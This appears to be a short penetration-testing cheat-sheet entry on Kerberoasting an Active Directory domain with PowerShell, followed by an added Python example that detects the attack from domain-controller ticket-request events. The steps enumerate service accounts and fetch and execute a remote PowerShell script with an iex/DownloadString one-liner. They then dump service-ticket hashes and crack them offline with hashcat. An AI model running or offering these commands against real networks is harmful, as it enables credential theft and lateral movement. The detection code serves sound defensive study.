Kerberoasting using PowerShell

foothold, windows, ad, kerberos, powershell

Overview

This requests a Kerberos service ticket for a service account and extracts a crackable hash from that ticket, using PowerShell.

Requirement

Steps

setspn -T medin -Q */*
iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1')
Invoke-Kerberoast -OutputFormat hashcat |fl

hashcat -m 13100 -a 0 hash.txt wordlist --force
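
From the defender's side, the ticket requests made in the steps above are logged on domain controllers as Security event 4769, and hashcat mode 13100 corresponds to RC4-HMAC (etype 23, logged as 0x17) tickets. The following is an added detection example, not part of the original page: it flags an account that receives RC4 service tickets for several distinct user-account services within a short window. The sample events, account names, window and threshold are constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records using EventData field names of Security event
# 4769 ("A Kerberos service ticket was requested"). These are not real logs.
FIELDS = ("time", "TargetUserName", "ServiceName", "TicketEncryptionType", "Status")
SAMPLE_EVENTS = [dict(zip(FIELDS, row)) for row in [
    ("2024-01-10T09:00:01", "alice@LAB.EXAMPLE", "FS01$",      "0x12", "0x0"),
    ("2024-01-10T09:02:10", "bob@LAB.EXAMPLE",   "svc_sql",    "0x17", "0x0"),
    ("2024-01-10T09:02:11", "bob@LAB.EXAMPLE",   "svc_web",    "0x17", "0x0"),
    ("2024-01-10T09:02:11", "bob@LAB.EXAMPLE",   "svc_backup", "0x17", "0x0"),
    ("2024-01-10T09:02:12", "bob@LAB.EXAMPLE",   "krbtgt",     "0x12", "0x0"),
    ("2024-01-10T09:30:00", "carol@LAB.EXAMPLE", "svc_sql",    "0x17", "0x0"),
    ("2024-01-10T11:45:00", "carol@LAB.EXAMPLE", "svc_web",    "0x12", "0x0"),
]]

RC4_HMAC = 0x17                  # etype 23, the ticket type hashcat mode 13100 takes
WINDOW = timedelta(minutes=5)    # assumed correlation window
THRESHOLD = 3                    # assumed threshold; tune to the environment


def suspicious(ev):
    """Successful RC4 service ticket for a user (non-machine) service account."""
    svc = ev["ServiceName"]
    return (int(ev["TicketEncryptionType"], 16) == RC4_HMAC
            and int(ev["Status"], 16) == 0
            and not svc.endswith("$")          # machine accounts end in $
            and svc.lower() != "krbtgt")       # TGT renewals are not of interest


def find_kerberoast_bursts(events, window=WINDOW, threshold=THRESHOLD):
    """Return {requester: sorted services} for accounts that got RC4 tickets
    for at least `threshold` distinct services inside one window."""
    per_user = defaultdict(list)
    for ev in events:
        if suspicious(ev):
            per_user[ev["TargetUserName"]].append(
                (datetime.fromisoformat(ev["time"]), ev["ServiceName"]))
    alerts = {}
    for user, hits in per_user.items():
        hits.sort()
        for i, (start, _) in enumerate(hits):
            services = {s for t, s in hits[i:] if t - start <= window}
            if len(services) >= threshold:
                alerts[user] = sorted(services)
                break
    return alerts
```

On the constructed sample only `bob@LAB.EXAMPLE` is flagged; a single RC4 request, as from `carol`, stays below the threshold.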

Alternative